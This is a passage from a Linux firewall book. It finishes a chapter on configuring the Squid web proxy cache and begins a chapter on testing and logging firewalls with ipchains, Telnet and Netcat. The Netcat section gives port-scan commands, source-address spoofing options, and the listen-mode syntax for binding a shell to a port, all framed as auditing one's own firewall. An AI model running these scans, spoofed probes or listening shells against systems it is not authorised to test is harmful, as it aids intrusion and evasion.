10.19 Configuring Lynx to Use the Squid Web Proxy Cache +www.syngress.com + +138_linux_10 6/20/01 9:50 AM Page 533 +Deploying the Squid Web Proxy Cache Server • Chapter 10 533 +5. Press ALT+X to exit the file.When prompted,type Y for “Yes”to save +the file,and press ENTER to write the file. +6. Use Lynx to enter the following URL:lynx http://www +.squid-cache.org. +7. The Squid home page will appear.If not,your browser proxy settings +are incorrectly configured. +Configuring Internet Explorer (Optional) +In this demonstration,you will configure Internet Explorer 5.5 on a Microsoft +Windows Millennium Edition system.The client configured in the following +steps is the proxy_client1 acl entry from the squid.conf file. +1. Open Internet Explorer. +2. Click the Tools menu and choose Internet Options. +3. Select the Connections tab,and click LAN Settings. +4. Deselect Automatically Detect Setting. +5. In the Proxy server section,click the Use a proxy server check box. +6. In the Address field,enter the IP address of your Squid Web Proxy +Cache server. +7. In the Port field,enter port 8080. +NOTE +You configured Squid to list on both ports 3128 and 8080 for caching +requests. Therefore, you can configure your clients for either port. +8. Your LAN Settings window will resemble Figure 10.20. +9. Click OK twice to return to the browser. +10. In Internet Explorer,enter the following URL:www.squid-cache.org. +11. The Squid home page will appear.If not,your browser proxy settings are +incorrectly configured. +www.syngress.com + +138_linux_10 6/20/01 9:50 AM Page 534 +534 Chapter 10 • Deploying the Squid Web Proxy Cache Server +Figure 10.20 Configuring Internet Explorer as a Squid Proxy Client +You have successfully implemented the Squid Web Proxy Cache server on a +network.You have also configured three different types of proxy clients to use +Squid’s cache. +www.syngress.com + +138_linux_10 6/20/01 9:50 AM Page 535 +Deploying the Squid Web Proxy Cache Server • Chapter 10 535 +Summary +In this chapter,you learned that a proxy server is an intermediary between hosts +on a local area network (LAN) and the Internet.It is used to implement caching +for certain services,and for security and administrative control.Proxy cache +servers are implemented at the Application layer and process specific Internet +protocols,such as Hypertext Transfer Protocol (HTTP) and File Transfer Protocol +(FTP).Rules are set up on the proxy server to determine how a workstation +request should be processed. +Proxy caching increases network performance because a Web page is immedi- +ately downloaded to the client from the proxy server without having to down- +load the Web page from the Internet each time.This speeds up Internet access on +the network and saves bandwidth.Adding a small amount of data to a Web cache +has a significant impact on browsing speed and bandwidth usage,especially in +large networks. +You also learned the difference between a packet filter and a proxy server.A +packet filter analyzes traffic at the Network (Layer 3) and Transport layers (Layer +4) of the Open System Interconnection (OSI) reference model.It can also filter +traffic by service,or port number.A proxy server is capable of analyzing packets +at the Application layer (Layer 7) of the OSI model.This allows much more flexi- +bility,because the traffic within one service,such as port 80 (HTTP) traffic,can +be filtered. +To learn how a proxy cache works,you implemented the Squid Web Proxy +Cache server,which is a free,Unix open source Web proxy cache.Squid is a Web +proxy cache that is based on the HTTP 1.1 specification.Squid is used only by +proxy clients,such as Web browsers,that access the Internet using HTTP.Any client +protocol supported by Squid must be sent as a proxy request in HTTP format. +Most browsers support this function,so the following protocols are supported on +most networks that implement Squid.The supported client protocols are FTP, +HTTP,Secure Sockets Layer (SSL),Wide Area Information Server (WAIS),and +Gopher.The protocols will work if you request them using your browser and if +your browser is configured as a proxy client to the Web proxy cache server. +Squid also supports internal and management protocols.These protocols are +used between caches that might exist on different (or the same) proxy-caching +servers,or for managing a proxy cache.The supported inter-cache and manage- +ment protocols are Internet Cache Protocol (ICP),Cache Digest,HTTP, +Hypertext Caching Protocol (HTCP),and Simple Network Management +Protocol (SNMP). +www.syngress.com + +138_linux_10 6/20/01 9:50 AM Page 536 +536 Chapter 10 • Deploying the Squid Web Proxy Cache Server +The two main hardware subsystems that Squid (or any other proxy cache) +uses heavily and must therefore perform well are the disk random seek time and +the amount of system memory. +You installed Squid and configured it using the /etc/squid/squid.conf file. +The squid.conf file is configured for the Squid configuration default settings and +can be used after several changes.You must make changes because squid.conf +denies access to all browsers by default.Squid is completely useless until you +make changes to the squid.conf.Each configuration option in squid.conf is +identified as a tag. +The http_port tag configures the HTTP port on which Squid listens for +proxy clients.The default port is 3128.The cache_dir tag specifies where the +cached data is stored.By default,the cache_dir is located in the /var/spool/squid +directory.The acl tag allows you to define an access list.The http_access tag per- +mits or denies access to Squid by using the access lists defined in the acl tags. +Proxy clients will be unable to use the Squid proxy-caching server until you +modify the http_access tags. +After you configured the squid.conf file,you started and tested Squid.You +used the Squid client program on the localhost to ensure that Web page data was +written to the cache. +Last,you configured several proxy clients to use the Squid Web Proxy Cache +server.The demonstration showed you how to configure three browsers for a +proxy server:a Linux system running Netscape Navigator and Lynx,and a +Microsoft Windows Millennium Edition system running Internet Explorer. +Solutions Fast Track +Benefits of Proxy Server Implementation +(cid:59) A Web proxy cache server can cache Web pages and FTP files for proxy +clients.They can also cache Web sites for load balancing. +(cid:59) Caching increases the performance of the network by decreasing the +amount of data transferred from outside of the local network. +(cid:59) Web proxy caching reduces bandwidth costs,increases network +performance during normal traffic and spikes,performs load balancing, +caches aborted requests,and functions even when a network’s Internet +connection fails. +www.syngress.com + +138_linux_10 6/20/01 9:50 AM Page 537 +Deploying the Squid Web Proxy Cache Server • Chapter 10 537 +Differentiating between a +Packet Filter and a Proxy Server +(cid:59) Packet filters analyze traffic at the Network (Layer 3) and Transport +layers (Layer 4) of the OSI model.A packet filter can determine whether +it will allow a certain IP address or IP address range to pass through,or +filter traffic by service,or port number. +(cid:59) A proxy server analyzes packets at the Application layer (Layer 7) of the +OSI model.This feature provides flexibility because the traffic within +one service,such as port 80 (HTTP) traffic,can be filtered. +Implementing the Squid Web Proxy Cache Server +(cid:59) The Squid Web Proxy Cache server allows administrators to set up a +Web proxy caching service,add access controls (rules),and cache DNS +lookups. +(cid:59) Client protocols supported by Squid must be sent as a proxy request in +HTTP format,and include FTP,HTTP,SSL,WAIS,and Gopher. +(cid:59) Squid is configured using the /etc/squid/squid.conf file,which defines +configurations such as the HTTP port number on which Squid listens +for HTTP requests,incoming and outgoing requests,timeout informa- +tion,and firewall access data. +(cid:59) Each configuration option in squid.conf is identified as a tag.The +http_port tag configures the HTTP port on which Squid listens for +proxy clients.The cache_dir tag specifies where the cached data is +stored.The acl tag allows you to define an access list.The http_access tag +permits or denies access to Squid.Squid will not function until you +make changes to the squid.conf file. +Configuring Proxy Clients +(cid:59) Firewalls can be configured to forward all port 80 traffic leaving the net- +work to the Web proxy cache server—clients do not need manual con- +figuration.In other cases,proxy clients automatically detect the proxy +server information on the network and use it for all Internet access. +www.syngress.com + +138_linux_10 6/20/01 9:50 AM Page 538 +538 Chapter 10 • Deploying the Squid Web Proxy Cache Server +(cid:59) All manual proxy client configurations are completed within the browser +application,and it’s just a matter of specifying the address of the Web +proxy cache server. +Frequently Asked Questions +The following Frequently Asked Questions, answered by the authors of this book, +are designed to both measure your understanding of the concepts presented in +this chapter and to assist you with real-life implementation of these concepts. To +have your questions about this chapter answered by the author, browse to +www.syngress.com/solutions and click on the “Ask the Author” form. +Q:What amount of system resources does Squid require? +A: Squid does not require an extremely fast processor;physical memory is the +crucial resource.For high-volume caches,fast disks are important because the +bottleneck generally occurs at the disk system.If possible,you should avoid +using IDE disks if you want to run Squid. +Q: Does Squid support any security protocols such as HTTPS,SSL,or TLS? +A: Squid offers limited support for secure protocols in that it “tunnels”or relays +encrypted bits between clients and servers. +It provides an alternative to the direct SSL connection that a browser +generally opens when it encounters an https://-prefixed URL.For HTTPS +requests,Squid uses the CONNECT request method to tunnel the request +from the browser.The CONNECT method enables tunneling of any con- +nection type through an HTTP proxy.Proxies simply transport bytes between +clients and servers,ignoring the connection’s contents.This provides secure +transmission of the data passed from the browser to the server. +Q: Can I run Squid behind a firewall? +A:Yes.However,if Squid is behind a firewall,it cannot directly access the +Internet.Therefore,you must use a parent cache for all connections. +You can dictate which requests to forward to the parent cache outside the +firewall by adding the never_direct access list to your squid.conf file.For +example,suppose you want all servers to connect through your parent cache +www.syngress.com + +138_linux_10 6/20/01 9:50 AM Page 539 +Deploying the Squid Web Proxy Cache Server • Chapter 10 539 +except those servers whose names end with safedomain.org.You could add +the following code to squid.conf: +acl INSIDE dstdomain safedomain.org +never_direct deny INSIDE +Any domains that do not match the INSIDE acl will be excluded.If no +domains are specified,then the opposite of the last action will occur by +default:Essentially,never_direct allow all would be the default rule applied. +Alternatively,you can use IP addresses instead of domain names to specify +your internal servers,as shown in the following code: +acl INSIDE_IP dst 207.58.100.45/24 +never_direct deny INSIDE +Consider that when using IP addresses instead of domain names,Squid +must first convert URL host names to IP addresses by performing DNS +lookups.Your DNS service might be unable to resolve external domains. +If you use more than one parent cache and you want to include the +never_direct access list in squid.conf,then it is advisable to specify one parent +cache as the default,as shown in the following code: +cache_peer abc.safedomain.org parent 3128 0 default +By using the default keyword in the cache_peer line,Squid doesn’t have to +decide which parent cache to use. +Q: I need to configure my cache_dir setting.At what size will my cache direc- +tory run Squid most effectively? +A:Administrators generally dedicate a disk partition to the Squid cache.It is +advisable to leave some space available rather than using the entire partition, +however,because Squid may behave unpredictably if disk space runs out. +Consider a 20GB disk,which will actually yield about 19GB of usable +space.If you place and mount a file system on this disk,and then use the df +program to determine the available space,you will see that some disk space is +lost to file system overheads (such as inodes,directory entries,superblocks, +etc.).Further consider that Unix generally reserves about 10 percent of disk +space.Therefore,after formatting a 20GB disk,you probably have only about +18GB available for your use. +www.syngress.com + +138_linux_10 6/20/01 9:50 AM Page 540 +540 Chapter 10 • Deploying the Squid Web Proxy Cache Server +In addition,the Squid swap.state files that reside in each cache directory +generally grow until the logs are rotated or Squid is restarted.Therefore,it is +advisable to reserve an additional 10 percent for these Squid overheads.The +more free space Squid has,the better it performs,so you may want to reserve +still more space to allow Squid that freedom.Considering all these factors,a +cache_dir setting of 14000 to 16500MB is advisable for a 20GB disk.You can +configure your cache_dir setting using the following code: +cache_dir ... 16000 16 256 +Try this conservative setting initially,and then check the disk usage once +the cache is full.You can increase the cache_dir setting gradually if you find +that you have extra free disk space.You need to decrease your cache size +immediately if you receive any “disk full”write errors. +Q: I want to locate the largest objects in my cache.Is there a command I can use +to do this? +A: Enter the following command in Squid to return a list of the objects in your +cache that are taking up the most space: +sort -r -n +4 -5 access.log | awk '{print $5, $7}' | head -25 +Q: How can I restart Squid with an empty cache? +A: Use the % squid -k shutdown command to stop Squid before attempting to +restart.There are a couple of methods you can use to restart Squid with a +clean cache.The fastest is to overwrite the swap.state files for each cache +directory.When using this method,leave a single byte of garbage in the +swap.state file.It is ineffective to reduce the file size to zero or delete the file +completely.For each cache directory,use the following command: +% echo "" > /cache1/swap.state +Do not change ownership or permissions on the swap.state files.After you +have modified the file for each directory,restart Squid. +Another more time-consuming method for this operation involves recre- +ating all the cache directories.Before doing this,you must move the existing +directories to another location,as demonstrated with the following code: +www.syngress.com + +138_linux_10 6/20/01 9:50 AM Page 541 +Deploying the Squid Web Proxy Cache Server • Chapter 10 541 +% cd /cache1 +% mkdir TEMP +% mv ?? swap.state* TEMP +% rm -rf TEMP & +Use the same process for each cache directory.Then issue the squid -z +command and Squid will create the new directories for you.When you +restart Squid,the cache will be clean. +www.syngress.com + +138_linux_10 6/20/01 9:50 AM Page 542 + +138_linux_11 6/20/01 9:51 AM Page 543 +Chapter 11 +Maintaining +Firewalls +Solutions in this chapter: +(cid:2) Testing Firewalls +(cid:2) Using Telnet, Ipchains, Netcat, and SendIP +to Probe Your Firewall +(cid:2) Understanding Firewall Logging, Blocking, +and Alert Options +(cid:2) Obtaining Additional Firewall +Logging Tools +(cid:59) Summary +(cid:59) Solutions Fast Track +(cid:59) Frequently Asked Questions +543 + +138_linux_11 6/20/01 9:51 AM Page 544 +544 Chapter 11 • Maintaining Firewalls +Introduction +Regardless of the type of firewall you deploy,you will have to test and maintain +it carefully.You need to actively monitor your firewall so that you can discover +scanning attacks,connection attempts,and general weaknesses.Of course,you +will have to scan your firewall to ensure that all extraneous ports and daemons +are closed.You can use a scanner such as Nessus (www.nessus.org) to do this. +However,even an application such as Nessus cannot implement the specific +attacks necessary to truly test your firewall.In this chapter,you will learn about +how to properly test and log activity.You will be able to verify that the firewall is +working,make intelligent changes on demand,and generate useful reports. +This chapter focuses on applications such as Telnet,Netcat,and SendIP,and +Nmap to query the firewall.Doing so will help you determine if your firewall is +truly protecting your network.Just one accidental omission of a rule can open a +hole that could allow a hacker into your network. +You may never know that a hacker has entered your network unless you +carefully monitor your firewall logs.Doing so is sometimes an unglamorous, +thankless job.However,using applications such as Firedaemon and Fwlogwatch, +both of which are profiled in this chapter,you can receive automatic alerts. +Fwlogwatch can even automatically reconfigure your firewall for you in case of a +scanning attack.Even if you choose to not automatically block traffic,using the +testing and logging tools discussed in this chapter you can maintain your firewall +so that it is blocking and allowing the right traffic for your business. +Testing Firewalls +Before you can start logging access to your firewall,you need to ensure that you +have configured it correctly in the first place.Even if you have extensive experi- +ence configuring firewalls,you will have to test your implementation when you +first install it.In fact,experienced professionals know that they have to continu- +ally test a firewall to ensure that it is properly configured,and that its current +configuration protects the network.It is not enough to just check or read the +Ipchains/Iptables rules and then think that you have properly tested the firewall. +You need to actively send packets and monitor your firewall and internal net- +work to be sure. +Before you learn about applications that can help you test your firewall,you +first need to consider some of the actual attacks,problems,and issues to look for. +When testing your firewall,consider the following: +www.syngress.com + +138_linux_11 6/20/01 9:51 AM Page 545 +Maintaining Firewalls • Chapter 11 545 +(cid:2) Internet Protocol (IP) spoofing Many hackers outside of the firewall +try to imitate internal network hosts in order to bypass authentication. +(cid:2) Open ports/daemons Many firewalls and/or routers allow unneces- +sary ports to remain open,which can expose your firewall to threats +unnecessarily. +(cid:2) Monitoring system hard drives, RAM, and processors If your +firewall runs out of disk space,or begins to run low on memory,your +network may become incapacitated.Check your server’s performance +regularly using standard tools (df,vmstat,top,and so forth). +(cid:2) Suspicious users, logins, and login times Even if you allow only +interactive login at your firewall,monitor it carefully to determine who +has logged on.It is vital that you know exactly who is controlling the +flow of packets on your network. +(cid:2) Check the rules database One of the common moves by a hacker is +to alter the rules database in subtle ways that make it easier for the +hacker to gain access to the network.Check your rules and compare +them carefully to ensure that no unauthorized changes have occurred. +(cid:2) Verify connectivity After you have configured or reconfigured +your firewall,make sure that these changes do not cause problems for +management and employees. +(cid:2) Remain informed concerning the operating system Bugs may be +discovered in the kernel and/or daemons that you are using.If you do +not keep current concerning the tools you are using,you may end up +exposing yourself to hackers. +(cid:2) Port scans If you are relatively new to securing firewalls,you will be +amazed to find out how many times your firewall will be scanned. +Logging all scans can consume an unnecessary amount of hard drive +space and processor time.Still,the proper amount of logging will help +you remain informed and will help you document scans that may be +preludes to an attack. +Following is a more detailed discussion concerning each of these issues. +www.syngress.com + +138_linux_11 6/20/01 9:51 AM Page 546 +546 Chapter 11 • Maintaining Firewalls +IP Spoofing +Your firewall should not allow any packets to pass from outside the network into +your internal network if the source address is the same as any host in your +internal network.Suppose,for example,that your external network interface card +(NIC) has the IP address of 128.1.2.3.4/16,and your internal NIC has the +address of 192.168.1.0/24.You then need to find a way to test your firewall to +see if any traffic is passing through the external interface from,say,the +192.168.1.1 IP address. +If such packets are able to traverse your firewall,then a hacker can configure +his or her system to use your firewall as a default gateway and participate on your +network.Leaving your packet-filtering firewall open to spoofing attacks largely +obviates the reason for having a firewall,so you should take every step to test +exactly what your firewall drops and allows.If you require,for example,your end +users to have access to the World Wide Web,you will find that it is necessary to +allow ephemeral ports (any port over 1023) to access the Internet.However,if +you are using private IP addresses (e.g.,the 192.168.45.0 network),no system +outside of the firewall should ever be able to assume this IP address and access +your internal network’s ephemeral ports. +Open Ports/Daemons +Your firewall should be as secure as possible.Disable all unused services and con- +figure the used ones with security in mind.If you are running Squid or another +proxy server on the firewall,make sure that only this port is open.Daemons such +as Telnet,File Transfer Protocol (FTP),Hypertext Transfer Protocol (HTTP) and +others should be shut down in almost all situations.In many situations,you may +require the ability to remotely administer your firewall.Still,consider disabling all +login to the outside interface. +In many situations,it is best to allow only interactive logins at your firewall. +This way,you need only secure the firewall’s physical security.If you must,use +only a relatively secure login application,such as Secure Shell (SSH).You could +also consider Kerberos,although this requires you to open several additional +ports.Even using one-time passwords (OTP) at the firewall is a solution,although +the use of OTP does not encrypt the data that subsequently passes from your +system to the router.If you do need to leave certain ports open,be prepared to +conduct regular scans of your firewall to test the daemons listening on these +ports.As suggested earlier,applications such as Nessus (www.nessus.org) are ideal +in this type of situation. +www.syngress.com + +138_linux_11 6/20/01 9:51 AM Page 547 +Maintaining Firewalls • Chapter 11 547 +Monitoring System Hard +Drives, RAM, and Processors +Firewall logs can consume hard drive space,especially in busy networks.If you +configured your firewall to log both accepted incoming and outgoing access,you +will find that your log files will grow very large in a short period of time.You +may need to cut back on your log settings.However,if you cannot do this,regu- +larly use the df -h command to discover the total amount of hard drive space +you have left.You could,for example,create a simple crontab entry that sends you +this information automatically every Monday at 8:05: +5 8 * * mon df -h | mail -s "HDRIVE" +security.manager@yournetwork.com +Of course,keeping the cron daemon enabled on your firewall can present its +own problems,because it will require you to ensure that this daemon is not sub- +ject to bugs that can cause a security problem.Any daemon,such as Cron,that +acts automatically can cause problems if misconfigured,so carefully review all +default scripts,and you will be in good shape.It is an additional service,after all. +You will have to make the decision yourself. +Following is a quick overview of standard Linux tools that can help you +determine if your system is becoming overburdened: +(cid:2) vmstat Informs you about the amount of random RAM and virtual +RAM used on the system. +(cid:2) top Used to inform you about the processes that occupy the largest +percentage of CPU time.The busiest processes rise to the top of the dis- +play.The Gtop and Ktop applications,both available from +www.rpmfind.net,are graphical versions that are somewhat easier to use +than the original. +Suspicious Users, Logins, and Login Times +Use the who and last commands to learn about who has logged in to the fire- +wall.In addition,manually check the /etc/passwd and /etc/shadow files to deter- +mine if any users have been added.An application such as Tripwire can be +extremely helpful if you wish to remain informed about any changes to such files. +www.syngress.com + +138_linux_11 6/20/01 9:51 AM Page 548 +548 Chapter 11 • Maintaining Firewalls +Check the Rules Database +Determine if any unauthorized changes have been made to your database.When +you first created your firewall,you should have created a backup using either the +ipchains-save or iptables-save commands.Use the diff command to compare +the two files to see if any changes have occurred.You may also use md5 to gen- +erate fingerprints of the configuration files to see whether any unauthorized +changes have been made to them. +Truly talented hackers are interested in entering a network and then control- +ling it without your knowledge.Accordingly,many will deactivate certain logging +rules on your firewall,and then activate them again.If you leave the ipchains or +iptables commands on your system,this will be very easy.To at least slow down +the hacker,try removing these applications from the system.This way,the hacker +will at least be forced to install these applications on your system before he or she +can manipulate it.If you have Tripwire installed,you will then be informed of +massive changes to the hard drive. +Verify Connectivity with Company +Management and End Users +After you install your firewall,check with various managers and employees to +ensure that your firewall rules are working properly.You may have to further +adjust your firewall to ensure that the right services are available to the company. +You may have to inform people about certain services that are no longer available +by design.Otherwise,you will receive help desk calls informing you that service +has been interrupted. +Employee education is often necessary whenever you make any changes to +the firewall.Otherwise,you will receive complaints that the network is “down,” +when in fact it is behaving according to your design.In order to cut down on ill +will and employee frustration,find ways to carefully and tactfully inform +employees concerning changes.Consider the following suggestions: +(cid:2) Contact management and make sure that they understand and agree +with the changes you are making. +(cid:2) Many times,upper management will ask for certain changes and not +quite understand how this will affect the end user.Decisions to cut off +certain services (e.g.,Web traffic,or access to outside Post Office +Protocol v3 [POP3] accounts) may negatively affect the company’s +ability to conduct business,or may cause unnecessary problems with +www.syngress.com + +138_linux_11 6/20/01 9:51 AM Page 549 +Maintaining Firewalls • Chapter 11 549 +employee morale.Make sure that upper management understands the +ramifications of any suggestions they make. +(cid:2) Warn employees before any changes to the security policy/firewall rules +will occur. +(cid:2) Remind employees that changes have occurred. +(cid:2) Use e-mail,word of mouth,and employee area bulletin boards to +remind people about changes. +Remain Informed Concerning the Operating System +New bugs are found every day in any operating system.It is possible that a bug +may be found in Ipchains/Iptables or the kernel that could be exploited.If you +do not subscribe to the appropriate mailing lists (see www.cert.org and +www.sans.org),you should.It is also likely that the version of Linux you are +using has a newsgroup associated with it. +The following are some additional strategies: +(cid:2) Join mailing lists associated with your operating system. +(cid:2) Carefully consider upgrades.Update only when you are certain that an +upgrade enhances both your system’s security and functionality.Do not +upgrade simply because an upgrade exists.Just because an upgrade offers +a new feature does not mean that this upgrade will allow your system to +remain secure.Added features often add complexity to your system,and +such changes open a security hole unless you take the time to properly +study the changes and alter your system’s configuration. +(cid:2) Network with fellow systems administrators.Share your concerns and +solutions with others.You will find that doing so will greatly increase +your awareness of the many security solutions that exist. +Port Scans +Ipchains/Iptables-based firewalls are classic examples of packet-filtering firewalls. +This type of firewall has traditionally been vulnerable to scanning attacks;they +can simply allow scans to occur without informing anyone,because packet filters +generally do not pay attention to Transmission Control Protocol (TCP)-based +connections.They are interested,rather,in filtering out IP addresses and ports +www.syngress.com + +138_linux_11 6/20/01 9:51 AM Page 550 +550 Chapter 11 • Maintaining Firewalls +(i.e.,they pay attention to the Network layer of the Open System +Interconnection Reference Model OSI/RM). +The introduction of log analysis software such as Firelogd and Fwlogdaemon +have made it possible to detect and block such scans,all the while sending an +alert to the systems administrator.This type of software can help reduce a fire- +wall’s exposure to distributed denial-of-service (DDoS) attacks,because it helps +the firewall completely drop certain hosts.However,this strategy introduces new +problems,because it is possible for attackers to spoof source IP addresses and +assume the identity of hosts you trust.The result is that hackers can use your own +strategies against you and make your own software conduct a DoS attack against +you by blocking your network from its own Domain Name System (DNS) +servers,default gateways,and other hosts that you trust implicitly.However,most +adjunct software,such as Fwlogwatch,provides ways to exclude trusted hosts +from being blocked.You will learn more about this later in this chapter. +NOTE +As long as unencrypted, non-IPsec versions of IPv4 remain the most com- +monly used version of the Internet Protocol, spoofing will remain a fact +of life. If you find that spoofing attacks keep occurring against your net- +work, you can take the following actions: +(cid:2) Edit the configuration files of your log-watching software and +increase thresholds to eliminate false positives. +(cid:2) Carefully manage any Ipchains/Iptables entries created by your +log-scanning software so that sensitive hosts are not blocked. +These strategies are ways that you can mitigate and manage spoofing +attacks, as opposed to eliminating them, because until all systems use +IPSec or move to IPv6, there is really no way to completely eliminate them. +Even when IPSec and/or IPv6 become common, it is likely that hackers will +find newer and cleverer ways to spoof these protocols as well. +Using Telnet, Ipchains, Netcat, and +SendIP to Probe Your Firewall +Now that you understand what to look for,you can use the following tools to +help you: +www.syngress.com + +138_linux_11 6/20/01 9:51 AM Page 551 +Maintaining Firewalls • Chapter 11 551 +(cid:2) Rule checkers Although Iptables does not support rule checking,the +ipchains -C command allows you to check how your existing rule set +operates.It will return information as to whether the packet is dropped +or accepted.It is up to you to act on this information. +(cid:2) Port scanners A simple port scan can help you determine which ports +are left open on your firewall.Using applications such as Telnet and +Netcat,you can then determine what daemon is listening behind that +port. +(cid:2) Packet generators Using applications such as SendIP,you can generate +packets designed to test whether your firewall rules are working properly. +Following is a discussion of some tools that allow you to quickly test your +firewall rules. +Ipchains +The ipchains -C option allows you to send packets to test whether the rules +you have created work properly.Iptables does not have the equivalent,as of this +writing.When checking Ipchains rules,you simply place -C (make sure you use +the uppercase C) in front of the rule.The --check and -C options,by the way, +are equivalent.You will be informed if the packet is blocked.For example,sup- +pose you create the following rule in Ipchains: +ipchains -I input -i eth0 -s 0/0 -d 0/0 -p icmp -j DENY +To test this rule,you would issue the following command on the same +system: +ipchains -C input -i eth0 -p icmp -s 0/0 1 -d 0/0 1 +Ipchains will then inform you that the packet is denied.This tool is handy if +you are logged in to the same system as you are testing,and you are becoming +familiar with the existing rules and wish to send out packets that test how the +rules are working. +Telnet +More universal testing methods exist.The humble Telnet application is still useful +when testing a firewall.Do not use it for logging on,however.You can use it to +test whether a certain firewall rule is running the way you think it should.For +www.syngress.com + +138_linux_11 6/20/01 9:51 AM Page 552 +552 Chapter 11 • Maintaining Firewalls +example,suppose that you allow all access but that which is explicitly denied by a +rule,and that you have configured the following firewall rule in Iptables: +iptables –A INPUT –i eth0 –s 0/0–p tcp --dport 80 –j LOG +iptables –A INPUT –i eth0 –s 0/0–p tcp --dport 80 –j REJECT +You can use your Telnet client to see whether it is working properly by speci- +fying the port you are blocking and logging: +prompt$ telnet firewall.yournetwork.com 80 +You can then view the log by using the tail command to read the file where +your system stores kernel messages.For the sake of convenience,use tail’s -f +option so that you can view results as they happen: +tail -f /var/log/messages +Using Multiple Terminals +If you have logged in to the firewall interactively,it is often useful to open two +terminals.You can use the first terminal to issue the telnet command,and you +can use the second terminal to view the results in the /var/log/messages file. +Remember that if you specify more complex logging options,and then send too +many packets,the kernel will stop logging traffic after a certain period of time +(three logging instances an hour,with only the first five packets logged).If you +do not remember this,you may make the mistake of thinking that a certain rule +is not working,when in fact it really is. +Netcat +You are not limited to using Telnet.One commonly used firewall testing applica- +tion is Netcat,available at www.l0pht.com/~weld/netcat/ and packetstorm.secu- +rify.com.Netcat is quite versatile,and is the self-described “Network Swiss Army +Knife.”Hackers and systems administrators alike use it as a tool to conduct scans, +communicate with open ports,and even transfer information between hosts. +Because it is so versatile,it can also be used against you,so if possible,you should +install this application only on a client system,rather than on the router.This is +because it can be used to open a back door on your system.Still,careful use of +the application can allow you to quickly audit your firewall. +Used in the simplest way,Netcat is much like a Telnet client,because it can +be used to access any remote host at any port.To connect to the host named fire- +www.syngress.com + +138_linux_11 6/20/01 9:51 AM Page 553 +Maintaining Firewalls • Chapter 11 553 +wall.yournetwork.com at port 80,you would issue the following command: +./nc firewall.yournetwork.com 80 +You will then have to press CTRL+C to exit the program.If the port is open, +you can then enter any command you wish.As far as port 80 is concerned,you +can just enter some gibberish once a connection is made,and the Web server will +return an error message,which usually includes the name of the Web server. +Chances are,the port will not recognize your command,but for the purposes of +testing a firewall,you usually want to just see if a port is open and listening.The +netcat -h command provides a list of all available options,which are listed in +Table 11.1 for your reference: +Table 11.1 Netcat Options +Option Description +-i value Tells Netcat to delay sending packets for a certain number of +seconds. For example, to have Netcat wait five seconds between +scanning ports, you would specify -i 5. +-n Has Netcat report information using only IP addresses. This option +is helpful when conducting ping scans, or if you do not have any +DNS support. +-p value A port spoofing option. Allows you to specify the port number of +the packet being sent. For example, to have a packet appear as it +were sent from port 53 of a host, you would enter -p 53. +-r Allows you to have Netcat scan ports at random, instead of simply +one after the other. +-s value Spoofs the source address of a packet. This option does not work +on all systems, however. +-u Netcat defaults to sending TCP packets. This option allows you to +send User Datagram Protocol (UDP) packets, instead. +-v Verbose mode. Reports additional information about the connec- +tions you are making. If you specify -v twice (-v -v), you will +receive twice the amount of information. +-w value Sets the time (in seconds) that Netcat will wait at a responding +port. This option is often combined with -z. +-z Called “zero-I/O mode,” this option has Netcat forbid any i/o from +the source system. If you do not use this option, Netcat will +Continued +www.syngress.com + +138_linux_11 6/20/01 9:51 AM Page 554 +554 Chapter 11 • Maintaining Firewalls +Table 11.1 Continued +Option Description +“hang” indefinitely at a port that responds. This option is mostly +applicable when using Netcat as a scanner. +-l Has Netcat open a listening port. Used with additional options, it +is possible to bind a root shell to this listening portlisten mode, +which can lead to security problems. +Sample Netcat Commands +To use Netcat in a more sophisticated and helpful way,you must use the fol- +lowing syntax: +nc [-options] hostname port[s] [ports] +For example,if you wish to scan ports 1 through 1023 of your firewall and +ensure that Netcat will not “hang”at any ports,you could issue the following +command: +./nc –z –w 2 –v –v firewall.yournetwork.com 1-1023 +The -z and -w 2 options tell Netcat to not bind a port,and to wait only two +seconds in case a connection is accidentally made.The two -v options place +Netcat into ultra verbose mode.It is likely,though,that only certain groups of +ports will be open on an unsecured firewall.For example,the following com- +mand scans only certain ports and groups of ports: +./nc –z –w 2 –v –v firewall.yournetwork.com 20-30, 53, 80, 100-112, 443, +6000-6050 +Analysis of Netcat Scan +The preceding scan searches for ports associated with several protocols,including: +(cid:2) FTP (20 and 21) +(cid:2) SSH (22) +(cid:2) Telnet (23) +(cid:2) DNS (53) +(cid:2) WWW (both 80 and 443) +www.syngress.com + +138_linux_11 6/20/01 9:51 AM Page 555 +Maintaining Firewalls • Chapter 11 555 +(cid:2) X (ports in the 6000 range) +Figure 11.1 shows the results of a scan against a router that has left several +ports open. +This firewall,for example,still allows connections to Simple Mail Transfer +Figure 11.1 Scanning an Open Router +Protocol (SMTP),the sunrpc portmapper service (port 111),and X.You can,of +course,specify additional ports.For example,the ranges of 20 through 00 and +5900 through 7000 can reveal commonly used ports.Consult your /etc/services +file for more ideas. +Additional Netcat Commands +When compiled properly,Netcat can also spoof IP addresses.If you wish to spoof +the source IP address,you would use the -s option: +./nc -s 10.100.100.1 –z –w 2 –v –v firewall.yournetwork.com 20-30, 53, +80, 100-112, 443, 6000-6050 +However,you should note that the -s option does not work well on some +operating systems.Because Netcat defaults to TCP,you can use the -u option to +send a UDP packet to a port: +www.syngress.com + +138_linux_11 6/20/01 9:51 AM Page 556 +556 Chapter 11 • Maintaining Firewalls +UDP Scans +./nc –u –w 2 firewall.yournetwork.com 80, 443 +You will have to press ENTER twice to finish the command.Depending on +the rules you have set (you will have to explicitly log UDP using either the -l +option in Ipchains or the -j LOG target in Iptables),your firewall will log this +traffic. +Testing Source Ports +If you have set a firewall rule to deny a particular source port,you can test it with +Netcat.For example,if you have prohibited all hosts from accessing ports 1 +through 1023 of an interface,you can test this by issuing the following command: +./nc -p 80 –w 2 –v –v firewall.yournetwork.com 1-1023 +Tools & Traps… +Additional Netcat Features +If you wish to have Netcat open a shell and listen for inbound connec- +tions (this is definitely not recommended in most circumstances), you +would use the following syntax: +nc -l -p port [-options] [hostname] [port] +In addition, Netcat ships with several scripts and applications. Some +of these are geared toward the hacker community, while others offer +quick solutions to common problems. Most of them are less practical +than they are interesting. For example, if you want to test port redirec- +tion, you can use the webproxy and webrelay applications found in the +scripts directory. +You can learn more about using Netcat in this way by reading the +README file that comes with the source code. For those who are truly +curious about using Netcat to open up listening connections, a patch +exists that allows you to authenticate and encrypt traffic that streams +between versions of Netcat running on opposite servers. Called aes-netcat, +you can download it from packetstorm.security.com and other sites. +www.syngress.com + +138_linux_11 6/20/01 9:51 AM Page 557 +Maintaining Firewalls • Chapter 11 557 +Testing DNS Connectivity +Many times,you will want to allow UDP and TCP access from and to port 